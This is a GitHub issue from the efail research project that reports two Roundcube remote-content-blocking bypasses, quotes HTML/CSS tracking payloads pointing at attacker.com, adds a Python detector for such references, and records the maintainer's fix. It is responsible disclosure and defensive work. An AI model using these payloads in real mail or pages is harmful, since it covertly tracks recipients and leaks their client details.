HTML Backchannels in Roundcube Bypass Remote Content Blocking #6178

Closed
jensvoid opened this issue Feb 14, 2018 · 2 comments

Comments


jensvoid commented Feb 14, 2018

In the scope of academic research within the efail project, in cooperation with Ruhr-University Bochum and FH Münster, Germany, we systematically analyzed Roundcube for 'web bugs' and other backchannels which have an impact on the user's privacy. The results are as follows.

Introduction

It is well known that spammers abuse 'web bugs' (1x1 pixel images in HTML emails) to track if their mails to a certain address are actually read. To respect the privacy of their customers most email clients, by default, block external content. However, we found bypasses for remote content blocking in Roundcube.

The Impact

The issue allows the sender of an email to leak information such as:

  • if and when the mail has been read
  • user's mail client and OS (via HTTP headers)
  • the number of users on a non-public mailing list

The Bypasses

The following bypasses to remote content blocking have been found:

```html
<image src="http://attacker.com">
<style>body {background-image: \75 \72 \6C ('http://attacker.com');}</style>
```

(Credits for this one go to https://github.com/cure53/HTTPLeaks/)
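As an added, runnable illustration (this is not Roundcube's code and not the reporter's; the sample strings are constructed from the two payloads quoted above, and all function and class names are the example's own), the script below shows why a literal-match remote-content filter misses both bypasses and what a checker has to do to catch them: apply the same two normalizations the browser applies before it fetches anything, namely decoding CSS backslash escapes before looking for `url(` and treating an `<image>` start tag as `<img>` (the HTML5 tree-construction alias). The naive filter is deliberately weak to make the gap visible; the parser-based checker is the hardened counterpart.

```python
import re
from html.parser import HTMLParser

# Constructed samples (assumption: not taken from any real mail): the two bypass
# payloads quoted in the issue, plus a classic <img> web bug for comparison.
SAMPLES = {
    "classic_web_bug": '<img src="http://attacker.com/pixel.gif" width="1" height="1">',
    "image_tag": '<image src="http://attacker.com">',
    "css_escaped_url": "<style>body {background-image: \\75 \\72 \\6C ('http://attacker.com');}</style>",
}


def is_remote(url: str) -> bool:
    """True for URLs that cause a network fetch: any scheme except cid:/data:, or //host."""
    url = url.strip()
    if url.startswith("//"):
        return True
    m = re.match(r"([a-z][a-z0-9+.-]*):", url, re.I)
    return bool(m) and m.group(1).lower() not in ("cid", "data")


def naive_has_remote_content(html: str) -> bool:
    """A literal-match filter of the kind both payloads slip past: it only looks for
    <img ... src=...> and for the verbatim token 'url('."""
    return bool(re.search(r"<img\b[^>]*\bsrc\s*=", html, re.I)
                or re.search(r"url\s*\(", html, re.I))


def decode_css_escapes(css: str) -> str:
    """Decode CSS backslash escapes as a browser's tokenizer does:
    \\HHHHHH (1-6 hex digits, one optional trailing whitespace is swallowed) -> code point,
    \\c (any other character) -> c.  So '\\75 \\72 \\6C ' decodes to 'url'."""
    def repl(m):
        if m.group(1):
            cp = int(m.group(1), 16)
            ok = 0 < cp <= 0x10FFFF and not 0xD800 <= cp <= 0xDFFF
            return chr(cp) if ok else "\ufffd"
        return m.group(2)
    return re.sub(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))", repl, css, flags=re.S)


def css_remote_refs(css: str):
    """Return [(how, url)] for every remote reference in a CSS string (url() and @import)."""
    css = decode_css_escapes(css)
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)   # a comment can split a token
    refs = []
    for m in re.finditer(r"url\s*\(\s*['\"]?([^'\")\s]+)", css, re.I):
        if is_remote(m.group(1)):
            refs.append(("url()", m.group(1)))
    for m in re.finditer(r"@import\s+['\"]([^'\"]+)", css, re.I):
        if is_remote(m.group(1)):
            refs.append(("@import", m.group(1)))
    return refs


class RemoteRefCollector(HTMLParser):
    """Walk the markup as a browser's tree builder would and collect remote references."""
    URL_ATTRS = {"src", "href", "background", "poster", "data", "lowsrc"}
    TAG_ALIASES = {"image": "img"}   # HTML5: an "image" start tag is processed as "img"

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.refs = []          # (where, how, url)
        self._style = None      # text buffer while inside <style>

    def handle_starttag(self, tag, attrs):
        tag = self.TAG_ALIASES.get(tag, tag)
        if tag == "style":
            self._style = []
        for name, value in attrs:
            if value is None:
                continue
            if name in self.URL_ATTRS and is_remote(value):
                self.refs.append((tag, name, value.strip()))
            elif name == "style":
                self.refs += [(tag, "style=" + how, u) for how, u in css_remote_refs(value)]

    def handle_data(self, data):
        if self._style is not None:
            self._style.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._style is not None:
            css = "".join(self._style)
            self.refs += [("<style>", how, u) for how, u in css_remote_refs(css)]
            self._style = None


def find_remote_refs(html: str):
    """Hardened check: every remote reference the browser would actually load."""
    p = RemoteRefCollector()
    p.feed(html)
    p.close()
    return p.refs


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:16} naive={naive_has_remote_content(sample)!s:5} "
              f"parsed={find_remote_refs(sample)}")
```

Two design points are worth carrying over to a real sanitizer. First, any check that runs on the raw bytes rather than on the decoded token stream is pattern-matching the attacker's spelling, not the browser's interpretation, so it will keep losing to new encodings; the HTTPLeaks collection credited above is a useful regression corpus for exactly that reason. Second, detection is only half of the control: a client that blocks remote content should rewrite or drop every URL-bearing attribute and every stylesheet it cannot fully parse, rather than leave the original markup in place whenever a blocklist pattern does not fire.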

@alecpl alecpl added this to the 1.3.5 milestone Feb 14, 2018

alecpl commented Feb 14, 2018

Confirmed both with git-master.


alecpl commented Feb 14, 2018

Fixed.
